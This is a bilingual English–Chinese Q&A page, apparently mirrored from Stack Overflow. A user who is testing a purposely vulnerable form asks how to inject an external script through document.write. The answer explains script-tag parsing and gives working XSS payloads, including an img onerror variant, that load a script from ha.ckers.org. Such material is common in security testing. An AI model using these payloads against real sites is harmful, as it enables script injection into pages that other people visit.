[英]load external javascript in the syntax
How do i load an external .js
script using this syntax?: 如何使用此语法加载外部
.js
脚本?:
<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
. <script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
。
For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know : 对于所有想知道的人,我设置了一个测试表格,故意使它变得脆弱,但是我无法启动它,是的,我知道:
<script src=//ha.ckers.org/xss.js></script>
Could easily work but i'm just trying to figure out how i could do it using document.write. 可以轻松地工作,但我只是想弄清楚如何使用document.write做到这一点。
Thanks to anyone who is able to help me. 感谢任何能够帮助我的人。 //Edit Why doesn't this work?
//编辑为什么不起作用?
<img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\\/script>')>
What you have to remember is that what lies within the <script>....</script>
tags is opaque to the browser. 您要记住的是,
<script>....</script>
标记内的内容对于浏览器是不透明的。 Its job is, having seen <script>
, to gather up everything largely without parsing it until it sees </script>
and then had that intervening text off to the JavaScript engine. 它的工作是,看到
<script>
,在不进行分析之前收集所有内容,直到看到</script>
为止,然后将中间的文本发送给JavaScript引擎。
In your case, what it sees between <script>
and </script>
is: 在您的情况下,在
<script>
和</script>
之间看到的是:
document.write('<script src=http://ha.ckers.org/xss.js>
...which obviously results in a syntax error. ...这显然会导致语法错误。 That's because the first
</script>
terminates the first <script>
: 那是因为第一个
</script>
终止了第一个 <script>
:
<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->
You have to break it up so it's not the literal sequence </script>
. 您必须将其分解,所以它不是文字序列
</script>
。 There are lots of ways to do that. 有很多方法可以做到这一点。 Add a
\\
: 添加
\\
:
<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>
or break the string: 或断开字符串:
<script>document.write('<script src=http://ha.ckers.org/xss.js></scr' + 'ipt>')</script>
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.